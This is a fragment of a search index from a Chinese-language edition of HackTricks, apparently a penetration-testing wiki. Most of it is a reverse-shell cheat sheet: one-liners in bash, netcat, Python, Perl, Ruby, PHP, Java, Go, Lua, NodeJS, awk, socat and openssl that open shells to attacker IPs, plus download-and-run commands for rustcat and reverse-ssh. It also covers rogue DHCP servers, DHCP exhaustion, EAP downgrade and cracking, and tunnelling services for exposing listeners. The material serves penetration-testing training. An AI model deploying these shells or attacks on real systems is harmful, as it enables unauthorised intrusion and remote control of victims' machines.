successful\\nresponse.raise_for_status() return response.text 然后,您可以运行: shell toboggan -m nix.py -i 直接利用交互式 shell。您可以添加 -b 以进行 Burpsuite 集成,并移除 -i 以获得更基本的 rce 包装器。 另一种可能性是使用 IppSec 的前向 shell 实现 https://github.com/IppSec/forward-shell 。 您只需修改: 漏洞主机的 URL 您的有效负载的前缀和后缀(如果有的话) 发送有效负载的方式(头部?数据?额外信息?) 然后,您可以直接 发送命令 ,甚至 使用 upgrade 命令 来获取完整的 PTY(请注意,管道的读取和写入大约有 1.3 秒的延迟)。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Forward Shell","id":"1225","title":"Forward Shell"},"1226":{"body":"bash nc -e /bin/sh \\nnc | /bin/sh #Blind\\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f\\nnc | /bin/bash | nc \\nrm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Netcat","id":"1226","title":"Netcat"},"1227":{"body":"在 https://www.gsocket.io/deploy/ 中查看 bash bash -c \\"$(curl -fsSL gsocket.io/x)\\"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » gsocket","id":"1227","title":"gsocket"},"1228":{"body":"bash telnet | /bin/sh #Blind\\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f\\ntelnet | /bin/bash | telnet \\nrm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Telnet","id":"1228","title":"Telnet"},"1229":{"body":"攻击者 bash while true; do nc -l ; done 要发送命令,请写下它,按回车,然后按CTRL+D(以停止STDIN) 受害者 bash export X=Connected; while true; do X=`eval $(whois -h -p \\"Output: $X\\")`; sleep 1; done","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Whois","id":"1229","title":"Whois"},"123":{"body":"VoIP 电话与 IoT 设备日益集成,提供例如通过特殊电话号码解锁门或控制恒温器等功能。然而,这种集成可能带来安全风险。 工具 voiphopper 被设计用于在多种环境(Cisco、Avaya、Nortel、Alcatel-Lucent)中模拟 VoIP 电话。它通过 CDP、DHCP、LLDP-MED 和 802.1Q ARP 等协议发现语音网络的 VLAN ID。 VoIP Hopper 提供三种用于 Cisco Discovery Protocol (CDP) 的模式: Sniff Mode (-c 0):分析网络数据包以识别 VLAN ID。 Spoof Mode (-c 1):生成自定义数据包以模拟真实 VoIP 设备的包。 Spoof with Pre-made Packet Mode (-c 2):发送与特定 Cisco IP 电话型号完全相同的包。 出于速度考虑首选第三种模式。它需要指定: 攻击者的网络接口(-i 参数)。 被模拟的 VoIP 设备名称(-E 参数),需符合 Cisco 命名格式(例如 SEP 后跟 MAC 地址)。 在企业环境中,为了模拟现有的 VoIP 设备,可以: 检查电话上的 MAC 标签。 在电话显示设置中查看型号信息。 将 VoIP 设备连接到笔记本,并使用 Wireshark 观察 CDP 请求。 在第三种模式下运行该工具的示例命令如下: bash voiphopper -i eth1 -E \'SEP001EEEEEEEEE \' -c 2","breadcrumbs":"Pentesting Network » VoIP 攻击与 VoIP Hopper 工具","id":"123","title":"VoIP 攻击与 VoIP Hopper 工具"},"1230":{"body":"bash #Linux\\nexport RHOST=\\"127.0.0.1\\";export RPORT=12345;python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\"RHOST\\"),int(os.getenv(\\"RPORT\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\"/bin/sh\\")\'\\npython -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.0.0.1\\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);\'\\n#IPv6\\npython -c \'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\\"dead:beef:2::125c\\",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\\"/bin/sh\\");\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Python","id":"1230","title":"Python"},"1231":{"body":"bash perl -e \'use Socket;$i=\\"\\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"/bin/sh -i\\");};\'\\nperl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\\"[IPADDR]:[PORT]\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Perl","id":"1231","title":"Perl"},"1232":{"body":"bash ruby -rsocket -e\'f=TCPSocket.open(\\"10.0.0.1\\",1234).to_i;exec sprintf(\\"/bin/sh -i <&%d >&%d 2>&%d\\",f,f,f)\'\\nruby -rsocket -e \'exit if fork;c=TCPSocket.new(\\"[IPADDR]\\",\\"[PORT]\\");while(cmd=c.gets);IO.popen(cmd,\\"r\\"){|io|c.print io.read}end\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Ruby","id":"1232","title":"Ruby"},"1233":{"body":"php // Using \'exec\' is the most common method, but assumes that the file descriptor will be 3.\\n// Using this method may lead to instances where the connection reaches out to the listener and then closes.\\nphp -r \'$sock=fsockopen(\\"10.0.0.1\\",1234);exec(\\"/bin/sh -i <&3 >&3 2>&3\\");\' // Using \'proc_open\' makes no assumptions about what the file descriptor will be.\\n// See https://security.stackexchange.com/a/198944 for more information\\n$sock, 1=>$sock, 2=>$sock), $pipes); ?> /dev/tcp/10.10.14.8/4444 0>&1\'\\"); ?>","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » PHP","id":"1233","title":"PHP"},"1234":{"body":"bash r = Runtime.getRuntime()\\np = r.exec([\\"/bin/bash\\",\\"-c\\",\\"exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \\\\$line 2>&5 >&5; done\\"] as String[])\\np.waitFor()","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Java","id":"1234","title":"Java"},"1235":{"body":"bash victim> ncat --ssl -c \\"bash -i 2>&1\\"\\nattacker> ncat -l --ssl","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Ncat","id":"1235","title":"Ncat"},"1236":{"body":"bash echo \'package main;import\\"os/exec\\";import\\"net\\";func main(){c,_:=net.Dial(\\"tcp\\",\\"192.168.0.134:8080\\");cmd:=exec.Command(\\"/bin/sh\\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Golang","id":"1236","title":"Golang"},"1237":{"body":"bash #Linux\\nlua -e \\"require(\'socket\');require(\'os\');t=socket.tcp();t:connect(\'10.0.0.1\',\'1234\');os.execute(\'/bin/sh -i <&3 >&3 2>&3\');\\"\\n#Windows & Linux\\nlua5.1 -e \'local host, port = \\"127.0.0.1\\", 4444 local socket = require(\\"socket\\") local tcp = socket.tcp() local io = require(\\"io\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \'r\') local s = f:read(\\"*a\\") f:close() tcp:send(s) if status == \\"closed\\" then break end end tcp:close()\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Lua","id":"1237","title":"Lua"},"1238":{"body":"javascript (function(){\\nvar net = require(\\"net\\"),\\ncp = require(\\"child_process\\"),\\nsh = cp.spawn(\\"/bin/sh\\", []);\\nvar client = new net.Socket();\\nclient.connect(8080, \\"10.17.26.64\\", function(){\\nclient.pipe(sh.stdin);\\nsh.stdout.pipe(client);\\nsh.stderr.pipe(client);\\n});\\nreturn /a/; // Prevents the Node.js application form crashing\\n})(); or require(\'child_process\').exec(\'nc -e /bin/sh [IPADDR] [PORT]\')\\nrequire(\'child_process\').exec(\\"bash -c \'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1\'\\") or -var x = global.process.mainModule.require\\n-x(\'child_process\').exec(\'nc [IPADDR] [PORT] -e /bin/bash\') or // If you get to the constructor of a function you can define and execute another function inside a string\\n\\"\\".sub.constructor(\\"console.log(global.process.mainModule.constructor._load(\\\\\\"child_process\\\\\\").execSync(\\\\\\"id\\\\\\").toString())\\")()\\n\\"\\".__proto__.constructor.constructor(\\"console.log(global.process.mainModule.constructor._load(\\\\\\"child_process\\\\\\").execSync(\\\\\\"id\\\\\\").toString())\\")() or // Abuse this syntax to get a reverse shell\\nvar fs = this.process.binding(\'fs\');\\nvar fs = process.binding(\'fs\'); or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » NodeJS","id":"1238","title":"NodeJS"},"1239":{"body":"bash # Requires no external binaries; leverages zsh/net/tcp module\\nzsh -c \'zmodload zsh/net/tcp; ztcp ; zsh -i <&$REPLY >&$REPLY 2>&$REPLY\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Zsh (内置 TCP)","id":"1239","title":"Zsh (内置 TCP)"},"124":{"body":"枚举 bash nmap --script broadcast-dhcp-discover\\nStarting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT\\nWARNING: No targets were specified, so 0 hosts scanned.\\nPre-scan script results:\\n| broadcast-dhcp-discover:\\n| Response 1 of 1:\\n| IP Offered: 192.168.1.250\\n| DHCP Message Type: DHCPOFFER\\n| Server Identifier: 192.168.1.1\\n| IP Address Lease Time: 1m00s\\n| Subnet Mask: 255.255.255.0\\n| Router: 192.168.1.1\\n| Domain Name Server: 192.168.1.1\\n|_ Domain Name: mynet\\nNmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds DoS 两种 DoS 类型 可以针对 DHCP 服务器执行。第一个方法是 模拟足够多的假主机以耗尽所有可能的 IP 地址 . 此攻击只有在您能看到 DHCP 服务器的响应并完成协议 ( Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)) 时才会生效。例如,这在 Wifi 网络中不可行 。 另一种针对 DHCP 执行 DoS 的方法是发送 使用每个可能的 IP 作为源地址的 DHCP-RELEASE packet 。然后,服务器将认为所有人都已停止使用这些 IP。 bash yersinia dhcp -attack 1\\nyersinia dhcp -attack 3 #More parameters are needed A more automatic way of doing this is using the tool DHCPing 你可以使用前面提到的 DoS attacks 来强制客户端在环境中获取新的租约,并耗尽合法服务器使其变得无响应。这样当合法设备尝试重新连接时, 你可以提供下一次攻击中提到的恶意值 。 配置恶意值 可以使用位于 /usr/share/responder/DHCP.py 的 DHCP 脚本 来设置一个 rogue DHCP server。此方法对网络攻击很有用,例如通过将流量重定向到恶意服务器来 capture HTTP 流量和凭证。然而,设置 rogue gateway 的效果较差,因为它只允许捕获客户端的出站流量,会错过来自真实 gateway 的响应。相反,建议设置 rogue DNS 或 WPAD 服务器以获得更有效的攻击。 下面是配置 rogue DHCP server 的命令选项: 我们的 IP 地址(网关通告) :Use -i 10.0.0.100 来将你的机器 IP 宣传为网关。 本地 DNS 域名 :可选,Use -d example.org 来设置本地 DNS 域名。 原始路由器/网关 IP :Use -r 10.0.0.1 来指定合法路由器或网关的 IP 地址。 主 DNS 服务器 IP :Use -p 10.0.0.100 将你控制的 rogue DNS 服务器的 IP 设置为主 DNS。 次要 DNS 服务器 IP :可选,Use -s 10.0.0.1 来设置次要 DNS 服务器 IP。 本地网络子网掩码 :Use -n 255.255.255.0 来定义本地网络的子网掩码。 用于 DHCP 流量的接口 :Use -I eth1 在指定的网络接口上监听 DHCP 流量。 WPAD 配置地址 :Use -w “http://10.0.0.100/wpad.dat” 来设置 WPAD 配置地址,以协助拦截 web 流量。 伪造默认网关 IP :包含 -S 来伪造默认 gateway IP。 响应所有 DHCP 请求 :包含 -R 使服务器响应所有 DHCP 请求,但要注意这会产生大量噪音并可能被检测到。 通过正确使用这些选项,可以建立一个 rogue DHCP server 来有效地拦截网络流量。 python # Example to start a rogue DHCP server with specified options\\n!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w \\"http://10.0.0.100/wpad.dat\\" -S -R","breadcrumbs":"Pentesting Network » DHCP 攻击","id":"124","title":"DHCP 攻击"},"1240":{"body":"https://github.com/robiot/rustcat – 现代的类似 netcat 的监听器,用 Rust 编写(自 2024 年起在 Kali 中打包)。 bash # Attacker – interactive TLS listener with history & tab-completion\\nrcat listen -ib 55600 # Victim – download static binary and connect back with /bin/bash\\ncurl -L https://github.com/robiot/rustcat/releases/latest/download/rustcat-x86_64 -o /tmp/rcat \\\\\\n&& chmod +x /tmp/rcat \\\\\\n&& /tmp/rcat connect -s /bin/bash 55600 特性: 可选的 --ssl 标志用于加密传输(TLS 1.3) -s 用于在受害者上生成任何二进制文件(例如 /bin/sh、python3) --up 自动升级为完全交互的 PTY","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Rustcat (rcat)","id":"1240","title":"Rustcat (rcat)"},"1241":{"body":"revsh 是一个小型 C 客户端/服务器,通过 加密的 Diffie-Hellman 隧道 提供完整的 TTY,并可以选择附加 TUN/TAP 接口以进行类似 VPN 的反向跳板。 bash # Build (or grab a pre-compiled binary from the releases page)\\ngit clone https://github.com/emptymonkey/revsh && cd revsh && make # Attacker – controller/listener on 443 with a pinned certificate\\nrevsh -c 0.0.0.0:443 -key key.pem -cert cert.pem # Victim – reverse shell over TLS to the attacker\\n./revsh :443 有用的标志: -b : 绑定 shell 而不是反向 -p socks5://127.0.0.1:9050 : 通过 TOR/HTTP/SOCKS 代理 -t : 创建一个 TUN 接口(反向 VPN) 由于整个会话是加密和多路复用的,它通常可以绕过简单的出站过滤,这会终止明文的 /dev/tcp shell。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » revsh(加密和可用于跳板)","id":"1241","title":"revsh(加密和可用于跳板)"},"1242":{"body":"攻击者(Kali) bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response 受害者 bash #Linux\\nopenssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows\\nopenssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » OpenSSL","id":"1242","title":"OpenSSL"},"1243":{"body":"https://github.com/andrew-d/static-binaries","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Socat","id":"1243","title":"Socat"},"1244":{"body":"bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane\\nattacker> socat FILE:`tty`,raw,echo=0 TCP::1337","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 绑定 shell","id":"1244","title":"绑定 shell"},"1245":{"body":"bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0\\nvictim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 反向 shell","id":"1245","title":"反向 shell"},"1246":{"body":"bash awk \'BEGIN {s = \\"/inet/tcp/0//\\"; while(42) { do{ printf \\"shell>\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\"exit\\") close(s); }}\' /dev/null","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Awk","id":"1246","title":"Awk"},"1247":{"body":"攻击者 bash while true; do nc -l 79; done 要发送命令,请写下它,按回车,然后按CTRL+D(以停止STDIN) 受害者 bash export X=Connected; while true; do X=`eval $(finger \\"$X\\"@ 2> /dev/null\')`; sleep 1; done export X=Connected; while true; do X=`eval $(finger \\"$X\\"@ 2> /dev/null | grep \'!\'|sed \'s/^!//\')`; sleep 1; done","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Finger","id":"1247","title":"Finger"},"1248":{"body":"bash #!/usr/bin/gawk -f BEGIN {\\nPort = 8080\\nPrompt = \\"bkd> \\" Service = \\"/inet/tcp/\\" Port \\"/0/0\\"\\nwhile (1) {\\ndo {\\nprintf Prompt |& Service\\nService |& getline cmd\\nif (cmd) {\\nwhile ((cmd |& getline) > 0)\\nprint $0 |& Service\\nclose(cmd)\\n}\\n} while (cmd != \\"exit\\")\\nclose(Service)\\n}\\n}","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Gawk","id":"1248","title":"Gawk"},"1249":{"body":"这将尝试连接到您系统的6001端口: bash xterm -display 10.0.0.1:1 要捕获反向 shell,您可以使用(将监听端口 6001): bash # Authorize host\\nxhost +targetip\\n# Listen\\nXnest :1","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Xterm","id":"1249","title":"Xterm"},"125":{"body":"Here are some of the attack tactics that can be used against 802.1X implementations: 通过 EAP 进行 Active brute-force password grinding 利用畸形的 EAP 内容攻击 RADIUS server ** (exploits) EAP 消息捕获并进行 offline password cracking (EAP-MD5 and PEAP) 强制 EAP-MD5 authentication 以绕过 TLS certificate validation 在使用 hub 或类似设备进行认证时注入恶意网络流量 If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using: eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt","breadcrumbs":"Pentesting Network » EAP 攻击","id":"125","title":"EAP 攻击"},"1250":{"body":"by frohoff 注意:Java 反向 shell 也适用于 Groovy bash String host=\\"localhost\\";\\nint port=8044;\\nString cmd=\\"cmd.exe\\";\\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Groovy","id":"1250","title":"Groovy"},"1251":{"body":"https://highon.coffee/blog/reverse-shell-cheat-sheet/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://github.com/robiot/rustcat https://github.com/emptymonkey/revsh tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 参考文献","id":"1251","title":"参考文献"},"1252":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 本页面的目标是提出替代方案,至少允许将本地原始 TCP 端口和本地网页 (HTTP) 暴露到互联网,而无需在其他服务器上安装任何东西(仅在本地需要时)。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » 将本地暴露到互联网","id":"1252","title":"将本地暴露到互联网"},"1253":{"body":"来自 https://serveo.net/ ,它允许多种 HTTP 和端口转发功能 免费 。 bash # Get a random port from serveo.net to expose local port 4444\\nssh -R 0:localhost:4444 serveo.net # Expose a web listening in localhost:300 in a random https URL\\nssh -R 80:localhost:3000 serveo.net","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Serveo","id":"1253","title":"Serveo"},"1254":{"body":"从 https://www.socketxp.com/download ,它允许暴露 tcp 和 http: bash # Expose tcp port 22\\nsocketxp connect tcp://localhost:22 # Expose http port 8080\\nsocketxp connect http://localhost:8080","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » SocketXP","id":"1254","title":"SocketXP"},"1255":{"body":"来自 https://ngrok.com/ ,它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\nngrok http 8000 # Expose port in 9000 (it requires a credit card, but you won\'t be charged)\\nngrok tcp 9000","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Ngrok","id":"1255","title":"Ngrok"},"1256":{"body":"从 https://telebit.cloud/ 它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\n/Users/username/Applications/telebit/bin/telebit http 3000 # Expose port in 9000\\n/Users/username/Applications/telebit/bin/telebit tcp 9000","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Telebit","id":"1256","title":"Telebit"},"1257":{"body":"来自 https://localxpose.io/ ,它提供多个 http 和端口转发功能 免费 。 bash # Expose web in port 8989\\nloclx tunnel http -t 8989 # Expose tcp port in 4545 (requires pro)\\nloclx tunnel tcp --port 4545","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » LocalXpose","id":"1257","title":"LocalXpose"},"1258":{"body":"从 https://expose.dev/ 它允许暴露 http 和 tcp 端口: bash # Expose web in 3000\\n./expose share http://localhost:3000 # Expose tcp port in port 4444 (REQUIRES PREMIUM)\\n./expose share-port 4444","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Expose","id":"1258","title":"Expose"},"1259":{"body":"来自 https://github.com/localtunnel/localtunnel ,它允许免费暴露 http: bash # Expose web in port 8000\\nnpx localtunnel --port 8000 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Expose local to the internet » Localtunnel","id":"1259","title":"Localtunnel"},"126":{"body":"FHRP (First Hop Redundancy Protocol) 是一类网络协议,旨在 创建一个热备冗余路由系统 。使用 FHRP,可以将物理路由器组合成一个逻辑设备,从而提高容错性并帮助分配负载。 Cisco Systems 工程师开发了两种 FHRP 协议:GLBP 和 HSRP。 GLBP & HSRP Attacks","breadcrumbs":"Pentesting Network » FHRP (GLBP & HSRP) Attacks","id":"126","title":"FHRP (GLBP & HSRP) Attacks"},"1260":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 完整 TTYs","id":"1260","title":"完整 TTYs"},"1261":{"body":"请注意,您在 SHELL 变量中设置的 shell 必须 在 /etc/shells 中 列出 ,否则会出现 The value for the SHELL variable was not found in the /etc/shells file This incident has been reported。此外,请注意,以下代码片段仅在 bash 中有效。如果您在 zsh 中,请在获取 shell 之前通过运行 bash 切换到 bash。 Python bash python3 -c \'import pty; pty.spawn(\\"/bin/bash\\")\' (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; note 您可以通过执行 stty -a 获取 行 和 列 的 数量 script bash script /dev/null -qc /bin/bash #/dev/null is to not store anything\\n(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; socat bash #Listener:\\nsocat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim:\\nsocat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 完整 TTY","id":"1261","title":"完整 TTY"},"1262":{"body":"python -c \'import pty; pty.spawn(\\"/bin/sh\\")\' echo os.system(\'/bin/bash\') /bin/sh -i script -qc /bin/bash /dev/null perl -e \'exec \\"/bin/sh\\";\' perl: exec \\"/bin/sh\\"; ruby: exec \\"/bin/sh\\" lua: os.execute(\'/bin/sh\') IRB: exec \\"/bin/sh\\" vi: :!bash vi: :set shell=/bin/bash:shell nmap: !sh","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » 生成shell","id":"1262","title":"生成shell"},"1263":{"body":"一种方便的 交互式shell访问 、 文件传输 和 端口转发 的方法是将静态链接的ssh服务器 ReverseSSH 放到目标上。 以下是针对x86的示例,使用了upx压缩的二进制文件。有关其他二进制文件,请查看 发布页面 。 在本地准备以捕获ssh端口转发请求: bash # Drop it via your preferred way, e.g.\\nwget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -v -l -p 4444 (2a) Linux 目标: bash # Drop it via your preferred way, e.g.\\nwget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 (2b) Windows 10 目标(对于早期版本,请查看 project readme ): bash # Drop it via your preferred way, e.g.\\ncertutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe reverse-ssh.exe -p 4444 kali@10.0.0.2 如果 ReverseSSH 端口转发请求成功,您现在应该能够使用默认密码 letmeinbrudipls 登录,前提是以运行 reverse-ssh(.exe) 的用户身份: bash # Interactive shell access\\nssh -p 8888 127.0.0.1 # Bidirectional file transfer\\nsftp -P 8888 127.0.0.1","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » ReverseSSH","id":"1263","title":"ReverseSSH"},"1264":{"body":"Penelope 自动将 Linux 反向 shell 升级为 TTY,处理终端大小,记录所有内容等等。它还为 Windows shell 提供 readline 支持。 penelope","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » Penelope","id":"1264","title":"Penelope"},"1265":{"body":"如果由于某种原因您无法获得完整的 TTY,您 仍然可以与期望用户输入的程序交互 。在以下示例中,密码被传递给 sudo 以读取文件: bash expect -c \'spawn sudo -S cat \\"/root/root.txt\\";expect \\"*password*\\";send \\"\\";send \\"\\\\r\\\\n\\";interact\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs » No TTY","id":"1265","title":"No TTY"},"1266":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 